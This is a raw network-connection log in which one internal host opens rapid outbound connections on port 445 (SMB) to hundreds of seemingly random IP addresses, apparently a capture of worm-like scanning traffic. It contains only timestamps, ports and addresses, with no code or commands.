May 8, 2023 05:37:13.438702106 CEST	51881	445	192.168.2.6	167.219.232.114
May 8, 2023 05:37:13.438884020 CEST	51882	445	192.168.2.6	208.24.100.171
May 8, 2023 05:37:13.439037085 CEST	51883	445	192.168.2.6	155.58.247.140
May 8, 2023 05:37:13.439330101 CEST	51884	445	192.168.2.6	57.76.161.152
May 8, 2023 05:37:13.439363956 CEST	51885	445	192.168.2.6	53.58.235.188
May 8, 2023 05:37:13.439517021 CEST	51886	445	192.168.2.6	69.108.229.75
May 8, 2023 05:37:13.439654112 CEST	51887	445	192.168.2.6	74.14.171.220
May 8, 2023 05:37:13.439840078 CEST	51888	445	192.168.2.6	29.112.45.91
May 8, 2023 05:37:13.439913988 CEST	51889	445	192.168.2.6	149.203.55.60
May 8, 2023 05:37:13.440062046 CEST	51890	445	192.168.2.6	64.233.99.53
May 8, 2023 05:37:13.440078020 CEST	51891	445	192.168.2.6	148.62.133.30
May 8, 2023 05:37:13.440232038 CEST	51892	445	192.168.2.6	44.92.212.192
May 8, 2023 05:37:13.440324068 CEST	51893	445	192.168.2.6	170.250.167.14
May 8, 2023 05:37:13.440375090 CEST	51894	445	192.168.2.6	193.54.21.203
May 8, 2023 05:37:13.440515041 CEST	51895	445	192.168.2.6	147.6.40.199
May 8, 2023 05:37:13.440566063 CEST	51896	445	192.168.2.6	26.20.9.128
May 8, 2023 05:37:13.454282999 CEST	51897	445	192.168.2.6	162.242.115.242
May 8, 2023 05:37:13.454602957 CEST	51898	445	192.168.2.6	83.66.110.93
May 8, 2023 05:37:13.454731941 CEST	51899	445	192.168.2.6	69.183.47.61
May 8, 2023 05:37:13.454855919 CEST	51900	445	192.168.2.6	132.59.136.209
May 8, 2023 05:37:13.454966068 CEST	51901	445	192.168.2.6	118.53.163.195
May 8, 2023 05:37:13.455061913 CEST	51902	445	192.168.2.6	52.173.132.135
May 8, 2023 05:37:13.472249031 CEST	51903	445	192.168.2.6	178.14.7.203
May 8, 2023 05:37:13.563896894 CEST	51905	445	192.168.2.6	107.165.99.56
May 8, 2023 05:37:13.633863926 CEST	51907	445	192.168.2.6	86.242.0.243
May 8, 2023 05:37:13.634445906 CEST	51908	445	192.168.2.6	203.229.59.78
May 8, 2023 05:37:13.636177063 CEST	51910	445	192.168.2.6	153.131.251.188
May 8, 2023 05:37:13.636681080 CEST	51911	445	192.168.2.6	180.217.26.92
May 8, 2023 05:37:13.636744976 CEST	51912	445	192.168.2.6	109.106.68.21
May 8, 2023 05:37:13.636744976 CEST	51913	445	192.168.2.6	141.165.55.104
May 8, 2023 05:37:13.674699068 CEST	51914	445	192.168.2.6	32.148.100.200
May 8, 2023 05:37:13.750858068 CEST	51915	445	192.168.2.6	13.253.133.194
May 8, 2023 05:37:14.573694944 CEST	51927	445	192.168.2.6	151.210.57.11
May 8, 2023 05:37:14.574042082 CEST	51928	445	192.168.2.6	134.185.82.176
May 8, 2023 05:37:14.574196100 CEST	51929	445	192.168.2.6	135.80.127.191
May 8, 2023 05:37:14.574350119 CEST	51930	445	192.168.2.6	120.84.0.166
May 8, 2023 05:37:14.574557066 CEST	51931	445	192.168.2.6	177.235.40.11
May 8, 2023 05:37:14.574604034 CEST	51932	445	192.168.2.6	199.123.177.3
May 8, 2023 05:37:14.574776888 CEST	51933	445	192.168.2.6	80.203.35.25
May 8, 2023 05:37:14.574960947 CEST	51935	445	192.168.2.6	115.95.206.115
May 8, 2023 05:37:14.575036049 CEST	51936	445	192.168.2.6	51.242.68.33
May 8, 2023 05:37:14.575125933 CEST	51937	445	192.168.2.6	73.241.122.191
May 8, 2023 05:37:14.575182915 CEST	51938	445	192.168.2.6	61.224.114.227
May 8, 2023 05:37:14.575285912 CEST	51939	445	192.168.2.6	136.197.138.133
May 8, 2023 05:37:14.575329065 CEST	51940	445	192.168.2.6	91.221.36.112
May 8, 2023 05:37:14.575445890 CEST	51941	445	192.168.2.6	48.129.10.133
May 8, 2023 05:37:14.575462103 CEST	51942	445	192.168.2.6	220.47.101.139
May 8, 2023 05:37:14.575609922 CEST	51943	445	192.168.2.6	181.114.10.126
May 8, 2023 05:37:14.575622082 CEST	51944	445	192.168.2.6	57.166.33.169
May 8, 2023 05:37:14.575754881 CEST	51945	445	192.168.2.6	209.105.46.192
May 8, 2023 05:37:14.575930119 CEST	51946	445	192.168.2.6	89.64.63.39
May 8, 2023 05:37:14.575934887 CEST	51947	445	192.168.2.6	44.88.207.125
May 8, 2023 05:37:14.576073885 CEST	51948	445	192.168.2.6	215.45.183.4
May 8, 2023 05:37:14.576077938 CEST	51949	445	192.168.2.6	210.189.112.235
May 8, 2023 05:37:14.592372894 CEST	51950	445	192.168.2.6	79.43.236.179
May 8, 2023 05:37:14.632360935 CEST	51952	445	192.168.2.6	107.165.99.57
May 8, 2023 05:37:14.775468111 CEST	51955	445	192.168.2.6	83.133.38.236
May 8, 2023 05:37:14.785804033 CEST	51956	445	192.168.2.6	133.249.8.151
May 8, 2023 05:37:14.786526918 CEST	51957	445	192.168.2.6	132.92.56.94
May 8, 2023 05:37:14.789598942 CEST	51958	445	192.168.2.6	130.197.239.11
May 8, 2023 05:37:14.790154934 CEST	51959	445	192.168.2.6	160.90.166.40
May 8, 2023 05:37:14.790688038 CEST	51960	445	192.168.2.6	194.243.45.133
May 8, 2023 05:37:14.825203896 CEST	51961	445	192.168.2.6	136.75.201.217
May 8, 2023 05:37:14.871661901 CEST	51962	445	192.168.2.6	96.155.150.196
May 8, 2023 05:37:14.875751972 CEST	445	51938	61.224.114.227	192.168.2.6
May 8, 2023 05:37:15.392720938 CEST	51938	445	192.168.2.6	61.224.114.227
May 8, 2023 05:37:15.693901062 CEST	51974	445	192.168.2.6	143.253.106.111
May 8, 2023 05:37:15.694084883 CEST	51975	445	192.168.2.6	80.217.254.67
May 8, 2023 05:37:15.694210052 CEST	51976	445	192.168.2.6	108.46.65.198
May 8, 2023 05:37:15.694334984 CEST	51977	445	192.168.2.6	47.75.40.112
May 8, 2023 05:37:15.694438934 CEST	51978	445	192.168.2.6	203.157.39.89
May 8, 2023 05:37:15.694555044 CEST	51979	445	192.168.2.6	142.16.98.219
May 8, 2023 05:37:15.694663048 CEST	51980	445	192.168.2.6	107.165.99.58
May 8, 2023 05:37:15.694809914 CEST	445	51938	61.224.114.227	192.168.2.6
May 8, 2023 05:37:15.721146107 CEST	51981	445	192.168.2.6	164.138.234.111
May 8, 2023 05:37:15.721237898 CEST	51982	445	192.168.2.6	8.226.22.106
May 8, 2023 05:37:15.721441984 CEST	51984	445	192.168.2.6	204.80.132.103
May 8, 2023 05:37:15.721529007 CEST	51985	445	192.168.2.6	114.225.223.38
May 8, 2023 05:37:15.721632957 CEST	51986	445	192.168.2.6	98.6.234.156
May 8, 2023 05:37:15.721725941 CEST	51987	445	192.168.2.6	9.173.146.42
May 8, 2023 05:37:15.721817017 CEST	51988	445	192.168.2.6	131.141.88.94
May 8, 2023 05:37:15.721920013 CEST	51989	445	192.168.2.6	8.35.163.248
May 8, 2023 05:37:15.722002029 CEST	51990	445	192.168.2.6	65.53.21.204
May 8, 2023 05:37:15.722099066 CEST	51991	445	192.168.2.6	87.178.9.64
May 8, 2023 05:37:15.722191095 CEST	51992	445	192.168.2.6	34.74.148.102
May 8, 2023 05:37:15.722306013 CEST	51993	445	192.168.2.6	54.181.63.249
May 8, 2023 05:37:15.722404003 CEST	51994	445	192.168.2.6	105.23.110.116
May 8, 2023 05:37:15.722489119 CEST	51995	445	192.168.2.6	149.130.5.79
May 8, 2023 05:37:15.722595930 CEST	51996	445	192.168.2.6	122.25.136.210
May 8, 2023 05:37:15.722687960 CEST	51997	445	192.168.2.6	17.119.214.245
May 8, 2023 05:37:15.722778082 CEST	51998	445	192.168.2.6	140.121.180.180
May 8, 2023 05:37:15.904159069 CEST	52002	445	192.168.2.6	33.3.25.138
May 8, 2023 05:37:15.924772024 CEST	52003	445	192.168.2.6	54.163.217.4
May 8, 2023 05:37:15.925204039 CEST	52004	445	192.168.2.6	143.113.133.166
May 8, 2023 05:37:15.925746918 CEST	52005	445	192.168.2.6	175.43.44.89
May 8, 2023 05:37:15.926295996 CEST	52006	445	192.168.2.6	136.242.214.75
May 8, 2023 05:37:15.926722050 CEST	52007	445	192.168.2.6	213.3.27.23
May 8, 2023 05:37:15.984081984 CEST	52008	445	192.168.2.6	139.228.72.24
May 8, 2023 05:37:16.004741907 CEST	52010	445	192.168.2.6	185.87.3.225
May 8, 2023 05:37:16.505120039 CEST	443	49692	13.107.5.88	192.168.2.6
May 8, 2023 05:37:16.753627062 CEST	52022	445	192.168.2.6	107.165.99.59
May 8, 2023 05:37:16.808304071 CEST	52023	445	192.168.2.6	198.62.212.149
May 8, 2023 05:37:16.808517933 CEST	52024	445	192.168.2.6	214.218.188.92
May 8, 2023 05:37:16.808710098 CEST	52025	445	192.168.2.6	123.52.74.50
May 8, 2023 05:37:16.808866024 CEST	52026	445	192.168.2.6	103.11.5.25
May 8, 2023 05:37:16.809020996 CEST	52027	445	192.168.2.6	110.53.81.148
May 8, 2023 05:37:16.809168100 CEST	52028	445	192.168.2.6	222.101.161.81
May 8, 2023 05:37:16.827620029 CEST	52029	445	192.168.2.6	187.220.180.22
May 8, 2023 05:37:16.827800035 CEST	52030	445	192.168.2.6	208.206.193.131
May 8, 2023 05:37:16.828089952 CEST	52032	445	192.168.2.6	162.101.169.149
May 8, 2023 05:37:16.828259945 CEST	52033	445	192.168.2.6	157.237.180.127
May 8, 2023 05:37:16.828407049 CEST	52034	445	192.168.2.6	168.71.51.89
May 8, 2023 05:37:16.828548908 CEST	52035	445	192.168.2.6	11.114.67.245
May 8, 2023 05:37:16.828835011 CEST	52037	445	192.168.2.6	186.12.218.149
May 8, 2023 05:37:16.828990936 CEST	52038	445	192.168.2.6	117.141.93.84
May 8, 2023 05:37:16.829158068 CEST	52039	445	192.168.2.6	39.15.3.162
May 8, 2023 05:37:16.829328060 CEST	52040	445	192.168.2.6	209.239.70.10
May 8, 2023 05:37:16.829499960 CEST	52041	445	192.168.2.6	38.106.62.167
May 8, 2023 05:37:16.829648018 CEST	52042	445	192.168.2.6	176.231.207.217
May 8, 2023 05:37:16.829809904 CEST	52043	445	192.168.2.6	121.127.200.197
May 8, 2023 05:37:16.829973936 CEST	52044	445	192.168.2.6	131.98.28.195
May 8, 2023 05:37:16.830126047 CEST	52045	445	192.168.2.6	4.192.208.47
May 8, 2023 05:37:16.830311060 CEST	52046	445	192.168.2.6	99.17.106.15
May 8, 2023 05:37:17.023336887 CEST	52050	445	192.168.2.6	212.248.236.149
May 8, 2023 05:37:17.063726902 CEST	52051	445	192.168.2.6	183.139.235.199
May 8, 2023 05:37:17.064348936 CEST	52052	445	192.168.2.6	212.19.81.207
May 8, 2023 05:37:17.064785957 CEST	52053	445	192.168.2.6	13.63.50.3
May 8, 2023 05:37:17.065335035 CEST	52054	445	192.168.2.6	16.176.131.40
May 8, 2023 05:37:17.065762997 CEST	52055	445	192.168.2.6	158.94.207.149
May 8, 2023 05:37:17.122489929 CEST	52056	445	192.168.2.6	223.209.222.46
May 8, 2023 05:37:17.143758059 CEST	52058	445	192.168.2.6	103.55.20.189
May 8, 2023 05:37:17.831969023 CEST	52068	445	192.168.2.6	107.165.99.60
May 8, 2023 05:37:17.913312912 CEST	52071	445	192.168.2.6	117.197.171.120
May 8, 2023 05:37:17.913552999 CEST	52072	445	192.168.2.6	112.120.47.51
May 8, 2023 05:37:17.913676977 CEST	52073	445	192.168.2.6	188.150.160.13
May 8, 2023 05:37:17.913794994 CEST	52074	445	192.168.2.6	128.20.33.3
May 8, 2023 05:37:17.914041042 CEST	52076	445	192.168.2.6	186.99.176.176
May 8, 2023 05:37:17.933140993 CEST	52078	445	192.168.2.6	14.121.214.170
May 8, 2023 05:37:17.933322906 CEST	52077	445	192.168.2.6	137.189.81.206
May 8, 2023 05:37:17.933322906 CEST	52079	445	192.168.2.6	126.252.175.116
May 8, 2023 05:37:17.933474064 CEST	52080	445	192.168.2.6	195.123.123.85
May 8, 2023 05:37:17.933480024 CEST	52081	445	192.168.2.6	196.220.192.36
May 8, 2023 05:37:17.933490038 CEST	52082	445	192.168.2.6	123.142.155.191
May 8, 2023 05:37:17.933634043 CEST	52083	445	192.168.2.6	25.15.197.77
May 8, 2023 05:37:17.933649063 CEST	52084	445	192.168.2.6	94.50.20.26
May 8, 2023 05:37:17.933984995 CEST	52087	445	192.168.2.6	115.108.29.117
May 8, 2023 05:37:17.933993101 CEST	52085	445	192.168.2.6	195.129.184.217
May 8, 2023 05:37:17.934139013 CEST	52088	445	192.168.2.6	61.241.107.102
May 8, 2023 05:37:17.934145927 CEST	52089	445	192.168.2.6	52.80.39.233
May 8, 2023 05:37:17.934154034 CEST	52086	445	192.168.2.6	25.183.223.33
May 8, 2023 05:37:17.934154034 CEST	52090	445	192.168.2.6	187.190.0.146
May 8, 2023 05:37:17.934318066 CEST	52091	445	192.168.2.6	197.219.208.18
May 8, 2023 05:37:17.934402943 CEST	52093	445	192.168.2.6	8.222.148.166
May 8, 2023 05:37:17.934482098 CEST	52094	445	192.168.2.6	57.214.117.237
May 8, 2023 05:37:18.136718035 CEST	52098	445	192.168.2.6	183.251.142.182
May 8, 2023 05:37:18.228698969 CEST	52100	445	192.168.2.6	153.161.124.231
May 8, 2023 05:37:18.230138063 CEST	52101	445	192.168.2.6	186.177.16.47
May 8, 2023 05:37:18.231231928 CEST	52102	445	192.168.2.6	74.102.104.200
May 8, 2023 05:37:18.231287956 CEST	52103	445	192.168.2.6	69.85.136.108
May 8, 2023 05:37:18.231303930 CEST	52104	445	192.168.2.6	13.109.50.232
May 8, 2023 05:37:18.272906065 CEST	52105	445	192.168.2.6	47.195.99.197
May 8, 2023 05:37:18.273578882 CEST	52107	445	192.168.2.6	159.202.248.193
May 8, 2023 05:37:18.916507959 CEST	52117	445	192.168.2.6	107.165.99.61
May 8, 2023 05:37:19.016952038 CEST	52120	445	192.168.2.6	57.236.200.206
May 8, 2023 05:37:19.016988993 CEST	52121	445	192.168.2.6	152.103.83.177
May 8, 2023 05:37:19.017194033 CEST	52122	445	192.168.2.6	115.5.15.14
May 8, 2023 05:37:19.017455101 CEST	52123	445	192.168.2.6	20.114.12.204
May 8, 2023 05:37:19.017525911 CEST	52124	445	192.168.2.6	30.71.11.93
May 8, 2023 05:37:19.032135010 CEST	52125	445	192.168.2.6	79.0.25.26
May 8, 2023 05:37:19.048261881 CEST	52126	445	192.168.2.6	70.48.192.102
May 8, 2023 05:37:19.048362970 CEST	52127	445	192.168.2.6	99.73.46.183
May 8, 2023 05:37:19.048465014 CEST	52128	445	192.168.2.6	139.142.136.9
May 8, 2023 05:37:19.048547983 CEST	52129	445	192.168.2.6	81.86.31.44
May 8, 2023 05:37:19.063170910 CEST	52130	445	192.168.2.6	55.59.90.9
May 8, 2023 05:37:19.063380003 CEST	52132	445	192.168.2.6	17.214.143.73
May 8, 2023 05:37:19.063422918 CEST	52131	445	192.168.2.6	206.200.124.69
May 8, 2023 05:37:19.063570976 CEST	52134	445	192.168.2.6	172.196.211.144
May 8, 2023 05:37:19.063641071 CEST	52135	445	192.168.2.6	154.236.215.63
May 8, 2023 05:37:19.063710928 CEST	52136	445	192.168.2.6	208.149.165.3
May 8, 2023 05:37:19.063772917 CEST	52137	445	192.168.2.6	16.233.136.90
May 8, 2023 05:37:19.063885927 CEST	52138	445	192.168.2.6	158.225.159.253
May 8, 2023 05:37:19.063967943 CEST	52139	445	192.168.2.6	143.123.175.6
May 8, 2023 05:37:19.064048052 CEST	52140	445	192.168.2.6	91.80.217.112
May 8, 2023 05:37:19.064124107 CEST	52141	445	192.168.2.6	12.131.156.108
May 8, 2023 05:37:19.064213037 CEST	52142	445	192.168.2.6	166.215.122.50
May 8, 2023 05:37:19.064295053 CEST	52143	445	192.168.2.6	102.140.248.247
May 8, 2023 05:37:19.280102968 CEST	52148	445	192.168.2.6	109.175.6.220
May 8, 2023 05:37:19.315762997 CEST	443	49691	13.107.5.88	192.168.2.6
May 8, 2023 05:37:19.374730110 CEST	52149	445	192.168.2.6	99.155.133.229
May 8, 2023 05:37:19.374819040 CEST	52152	445	192.168.2.6	163.194.24.247
May 8, 2023 05:37:19.374833107 CEST	52151	445	192.168.2.6	185.133.170.175
May 8, 2023 05:37:19.374833107 CEST	52150	445	192.168.2.6	80.14.166.100
May 8, 2023 05:37:19.374878883 CEST	52153	445	192.168.2.6	115.156.44.162
May 8, 2023 05:37:19.395483971 CEST	52154	445	192.168.2.6	59.43.229.44
May 8, 2023 05:37:19.441214085 CEST	52156	445	192.168.2.6	206.51.3.122
May 8, 2023 05:37:19.981676102 CEST	52166	445	192.168.2.6	107.165.99.62
May 8, 2023 05:37:20.120064974 CEST	52168	445	192.168.2.6	208.52.0.8
May 8, 2023 05:37:20.120299101 CEST	52169	445	192.168.2.6	15.82.157.190
May 8, 2023 05:37:20.120357037 CEST	52170	445	192.168.2.6	216.21.190.17
May 8, 2023 05:37:20.136389017 CEST	52172	445	192.168.2.6	119.143.21.72
May 8, 2023 05:37:20.136482954 CEST	52173	445	192.168.2.6	190.118.193.9
May 8, 2023 05:37:20.150954962 CEST	52174	445	192.168.2.6	172.126.245.160
May 8, 2023 05:37:20.169114113 CEST	52176	445	192.168.2.6	17.181.106.82
May 8, 2023 05:37:20.169142962 CEST	52177	445	192.168.2.6	120.93.93.139
May 8, 2023 05:37:20.169298887 CEST	52178	445	192.168.2.6	134.174.154.191
May 8, 2023 05:37:20.169316053 CEST	52179	445	192.168.2.6	73.4.64.98
May 8, 2023 05:37:20.182538033 CEST	52180	445	192.168.2.6	116.117.99.27
May 8, 2023 05:37:20.182641983 CEST	52181	445	192.168.2.6	42.37.31.232
May 8, 2023 05:37:20.182760954 CEST	52182	445	192.168.2.6	75.175.80.151
May 8, 2023 05:37:20.182845116 CEST	52183	445	192.168.2.6	196.247.29.9
May 8, 2023 05:37:20.182964087 CEST	52184	445	192.168.2.6	104.176.188.249
May 8, 2023 05:37:20.183113098 CEST	52185	445	192.168.2.6	124.131.136.124
May 8, 2023 05:37:20.183242083 CEST	52186	445	192.168.2.6	161.62.217.46
May 8, 2023 05:37:20.183336020 CEST	52187	445	192.168.2.6	109.71.83.86
May 8, 2023 05:37:20.183425903 CEST	52188	445	192.168.2.6	31.7.243.87
May 8, 2023 05:37:20.183523893 CEST	52189	445	192.168.2.6	12.194.94.92
May 8, 2023 05:37:20.183723927 CEST	52191	445	192.168.2.6	93.89.11.209
May 8, 2023 05:37:20.183820963 CEST	52192	445	192.168.2.6	24.187.205.40
May 8, 2023 05:37:20.183917046 CEST	52193	445	192.168.2.6	149.248.53.60
May 8, 2023 05:37:20.499564886 CEST	52196	445	192.168.2.6	115.128.101.49
May 8, 2023 05:37:20.625627995 CEST	52200	445	192.168.2.6	32.37.34.147
May 8, 2023 05:37:20.625946045 CEST	52202	445	192.168.2.6	41.29.249.145
May 8, 2023 05:37:20.626317024 CEST	52203	445	192.168.2.6	38.0.146.99
May 8, 2023 05:37:20.626775026 CEST	52204	445	192.168.2.6	138.66.65.23
May 8, 2023 05:37:20.627156019 CEST	52205	445	192.168.2.6	197.62.242.85
May 8, 2023 05:37:20.627548933 CEST	52206	445	192.168.2.6	173.127.136.124
May 8, 2023 05:37:20.627947092 CEST	52207	445	192.168.2.6	125.62.94.57
May 8, 2023 05:37:20.711664915 CEST	445	52205	197.62.242.85	192.168.2.6
May 8, 2023 05:37:20.943969011 CEST	443	49690	13.107.42.16	192.168.2.6
May 8, 2023 05:37:21.097893000 CEST	52216	445	192.168.2.6	107.165.99.63
May 8, 2023 05:37:21.226290941 CEST	52205	445	192.168.2.6	197.62.242.85
May 8, 2023 05:37:21.288296938 CEST	52219	445	192.168.2.6	106.223.213.174
May 8, 2023 05:37:21.288404942 CEST	52220	445	192.168.2.6	195.169.152.44
May 8, 2023 05:37:21.288537979 CEST	52221	445	192.168.2.6	182.90.39.59
May 8, 2023 05:37:21.288768053 CEST	52223	445	192.168.2.6	211.145.226.212
May 8, 2023 05:37:21.288866997 CEST	52224	445	192.168.2.6	102.235.40.83
May 8, 2023 05:37:21.289017916 CEST	52225	445	192.168.2.6	21.187.181.239
May 8, 2023 05:37:21.289062023 CEST	52226	445	192.168.2.6	107.113.68.33
May 8, 2023 05:37:21.289175987 CEST	52227	445	192.168.2.6	163.2.129.201
May 8, 2023 05:37:21.289340973 CEST	52228	445	192.168.2.6	44.2.105.66
May 8, 2023 05:37:21.289474010 CEST	52229	445	192.168.2.6	108.184.58.217
May 8, 2023 05:37:21.289571047 CEST	52230	445	192.168.2.6	12.235.82.199
May 8, 2023 05:37:21.289697886 CEST	52231	445	192.168.2.6	186.199.207.25
May 8, 2023 05:37:21.289810896 CEST	52232	445	192.168.2.6	154.51.129.253
May 8, 2023 05:37:21.289937019 CEST	52233	445	192.168.2.6	206.54.77.176
May 8, 2023 05:37:21.290026903 CEST	52234	445	192.168.2.6	139.201.124.177
May 8, 2023 05:37:21.290152073 CEST	52235	445	192.168.2.6	27.113.64.128
May 8, 2023 05:37:21.290276051 CEST	52236	445	192.168.2.6	77.124.27.127
May 8, 2023 05:37:21.290376902 CEST	52237	445	192.168.2.6	146.107.104.155
May 8, 2023 05:37:21.290580988 CEST	52239	445	192.168.2.6	120.97.14.252
May 8, 2023 05:37:21.290695906 CEST	52240	445	192.168.2.6	156.54.187.148
May 8, 2023 05:37:21.290894032 CEST	52242	445	192.168.2.6	16.241.0.95
May 8, 2023 05:37:21.290991068 CEST	52243	445	192.168.2.6	102.27.254.173
May 8, 2023 05:37:21.291104078 CEST	52244	445	192.168.2.6	158.173.243.223
May 8, 2023 05:37:21.310375929 CEST	445	52205	197.62.242.85	192.168.2.6
May 8, 2023 05:37:21.939687967 CEST	52248	445	192.168.2.6	56.70.62.76
May 8, 2023 05:37:21.940268040 CEST	52249	445	192.168.2.6	204.27.175.221
May 8, 2023 05:37:21.942023039 CEST	52253	445	192.168.2.6	50.26.52.213
May 8, 2023 05:37:21.942538023 CEST	52254	445	192.168.2.6	115.85.204.77
May 8, 2023 05:37:21.943095922 CEST	52255	445	192.168.2.6	9.191.219.242
May 8, 2023 05:37:21.943567038 CEST	52258	445	192.168.2.6	95.18.185.5
May 8, 2023 05:37:21.960736036 CEST	52262	445	192.168.2.6	59.101.221.68
May 8, 2023 05:37:22.238217115 CEST	52266	445	192.168.2.6	107.165.99.64
May 8, 2023 05:37:23.509470940 CEST	52269	445	192.168.2.6	51.187.247.80
May 8, 2023 05:37:23.509602070 CEST	52270	445	192.168.2.6	93.45.84.88
May 8, 2023 05:37:23.509857893 CEST	52271	445	192.168.2.6	97.66.248.36
May 8, 2023 05:37:23.510085106 CEST	52272	445	192.168.2.6	100.187.128.227
May 8, 2023 05:37:23.510268927 CEST	52273	445	192.168.2.6	168.191.195.75
May 8, 2023 05:37:23.510473013 CEST	52274	445	192.168.2.6	190.137.119.245
May 8, 2023 05:37:23.593275070 CEST	52275	445	192.168.2.6	43.40.181.57
May 8, 2023 05:37:23.593499899 CEST	52276	445	192.168.2.6	162.66.9.162
May 8, 2023 05:37:23.593612909 CEST	52277	445	192.168.2.6	113.200.156.153
May 8, 2023 05:37:23.593719006 CEST	52278	445	192.168.2.6	151.134.87.66
May 8, 2023 05:37:23.593905926 CEST	52280	445	192.168.2.6	49.185.208.170
May 8, 2023 05:37:23.594005108 CEST	52281	445	192.168.2.6	155.249.242.47
May 8, 2023 05:37:23.594176054 CEST	52283	445	192.168.2.6	132.56.168.221
May 8, 2023 05:37:23.594288111 CEST	52284	445	192.168.2.6	7.149.89.109
May 8, 2023 05:37:23.594374895 CEST	52285	445	192.168.2.6	139.196.129.171
May 8, 2023 05:37:23.594530106 CEST	52287	445	192.168.2.6	180.132.76.163
May 8, 2023 05:37:23.594643116 CEST	52288	445	192.168.2.6	171.12.123.13
May 8, 2023 05:37:23.594703913 CEST	52289	445	192.168.2.6	81.208.175.161
May 8, 2023 05:37:23.594891071 CEST	52291	445	192.168.2.6	71.38.36.6
May 8, 2023 05:37:23.594980955 CEST	52292	445	192.168.2.6	199.165.33.211
May 8, 2023 05:37:23.595073938 CEST	52293	445	192.168.2.6	85.122.130.144
May 8, 2023 05:37:23.595149994 CEST	52294	445	192.168.2.6	81.155.0.46
May 8, 2023 05:37:23.595294952 CEST	52295	445	192.168.2.6	147.165.190.27
May 8, 2023 05:37:23.595383883 CEST	52296	445	192.168.2.6	107.165.99.65
May 8, 2023 05:37:23.621835947 CEST	52302	445	192.168.2.6	44.232.40.131
May 8, 2023 05:37:23.623084068 CEST	52308	445	192.168.2.6	198.246.106.90
May 8, 2023 05:37:23.623759985 CEST	52309	445	192.168.2.6	151.86.198.27
May 8, 2023 05:37:23.624382973 CEST	52310	445	192.168.2.6	29.56.150.11
May 8, 2023 05:37:23.625520945 CEST	52313	445	192.168.2.6	209.180.64.2
May 8, 2023 05:37:23.626267910 CEST	52314	445	192.168.2.6	159.230.73.109
May 8, 2023 05:37:23.626941919 CEST	52315	445	192.168.2.6	46.126.167.15
May 8, 2023 05:37:23.627633095 CEST	52318	445	192.168.2.6	151.72.149.10
May 8, 2023 05:37:24.621345997 CEST	52322	445	192.168.2.6	107.226.253.225
May 8, 2023 05:37:24.621422052 CEST	52321	445	192.168.2.6	208.141.91.81
May 8, 2023 05:37:24.621691942 CEST	52323	445	192.168.2.6	86.87.143.204
May 8, 2023 05:37:24.621819973 CEST	52324	445	192.168.2.6	188.57.134.136
May 8, 2023 05:37:24.622162104 CEST	52326	445	192.168.2.6	68.147.234.15
May 8, 2023 05:37:24.622193098 CEST	52325	445	192.168.2.6	35.228.194.142
May 8, 2023 05:37:24.659276009 CEST	52327	445	192.168.2.6	107.165.99.66
May 8, 2023 05:37:24.698677063 CEST	52328	445	192.168.2.6	139.228.122.129
May 8, 2023 05:37:24.698848009 CEST	52329	445	192.168.2.6	213.145.172.86
May 8, 2023 05:37:24.699014902 CEST	52330	445	192.168.2.6	211.221.67.169
May 8, 2023 05:37:24.699132919 CEST	52331	445	192.168.2.6	176.187.141.183
May 8, 2023 05:37:24.699377060 CEST	52333	445	192.168.2.6	124.207.225.140
May 8, 2023 05:37:24.699570894 CEST	52334	445	192.168.2.6	28.222.199.213
May 8, 2023 05:37:24.699752092 CEST	52336	445	192.168.2.6	140.124.134.187
May 8, 2023 05:37:24.699917078 CEST	52337	445	192.168.2.6	161.67.1.216
May 8, 2023 05:37:24.700026989 CEST	52338	445	192.168.2.6	35.21.175.17
May 8, 2023 05:37:24.700423956 CEST	52340	445	192.168.2.6	36.4.127.41
May 8, 2023 05:37:24.700474977 CEST	52341	445	192.168.2.6	221.6.84.39
May 8, 2023 05:37:24.700530052 CEST	52342	445	192.168.2.6	108.18.75.133
May 8, 2023 05:37:24.700902939 CEST	52344	445	192.168.2.6	99.155.129.14
May 8, 2023 05:37:24.700915098 CEST	52345	445	192.168.2.6	3.150.231.27
May 8, 2023 05:37:24.701035023 CEST	52346	445	192.168.2.6	212.241.80.225
May 8, 2023 05:37:24.701174021 CEST	52347	445	192.168.2.6	13.215.201.244
May 8, 2023 05:37:24.701277018 CEST	52348	445	192.168.2.6	75.53.225.188
May 8, 2023 05:37:24.730508089 CEST	52354	445	192.168.2.6	90.49.11.224
May 8, 2023 05:37:24.731659889 CEST	52360	445	192.168.2.6	27.1.83.175
May 8, 2023 05:37:24.732072115 CEST	52361	445	192.168.2.6	60.208.193.134
May 8, 2023 05:37:24.732601881 CEST	52362	445	192.168.2.6	204.127.24.69
May 8, 2023 05:37:24.733158112 CEST	52365	445	192.168.2.6	218.77.248.167
May 8, 2023 05:37:24.733795881 CEST	52366	445	192.168.2.6	126.56.136.7
May 8, 2023 05:37:24.734200001 CEST	52367	445	192.168.2.6	29.14.67.254
May 8, 2023 05:37:24.734638929 CEST	52370	445	192.168.2.6	162.166.159.83
May 8, 2023 05:37:25.723355055 CEST	52373	445	192.168.2.6	107.165.99.67
May 8, 2023 05:37:25.742827892 CEST	52374	445	192.168.2.6	72.219.240.226
May 8, 2023 05:37:25.743072033 CEST	52375	445	192.168.2.6	131.152.108.180
May 8, 2023 05:37:25.743240118 CEST	52376	445	192.168.2.6	123.45.38.227
May 8, 2023 05:37:25.743352890 CEST	52377	445	192.168.2.6	216.134.235.50
May 8, 2023 05:37:25.743551016 CEST	52378	445	192.168.2.6	35.194.158.48
May 8, 2023 05:37:25.743624926 CEST	52379	445	192.168.2.6	23.235.144.243
May 8, 2023 05:37:25.823947906 CEST	52381	445	192.168.2.6	221.246.112.104
May 8, 2023 05:37:25.823966026 CEST	52380	445	192.168.2.6	158.253.55.149
May 8, 2023 05:37:25.824213982 CEST	52382	445	192.168.2.6	37.140.157.163
May 8, 2023 05:37:25.824465036 CEST	52383	445	192.168.2.6	181.224.108.117
May 8, 2023 05:37:25.824738979 CEST	52385	445	192.168.2.6	105.116.117.98
May 8, 2023 05:37:25.824968100 CEST	52386	445	192.168.2.6	24.97.125.101
May 8, 2023 05:37:25.825158119 CEST	52388	445	192.168.2.6	126.143.134.113
May 8, 2023 05:37:25.825376034 CEST	52389	445	192.168.2.6	146.124.74.198
May 8, 2023 05:37:25.825555086 CEST	52390	445	192.168.2.6	76.175.95.108
May 8, 2023 05:37:25.825823069 CEST	52392	445	192.168.2.6	32.187.245.218
May 8, 2023 05:37:25.825992107 CEST	52394	445	192.168.2.6	198.223.205.199
May 8, 2023 05:37:25.825995922 CEST	52393	445	192.168.2.6	12.117.29.64
May 8, 2023 05:37:25.826138973 CEST	52396	445	192.168.2.6	125.45.228.42
May 8, 2023 05:37:25.826291084 CEST	52397	445	192.168.2.6	30.228.34.161
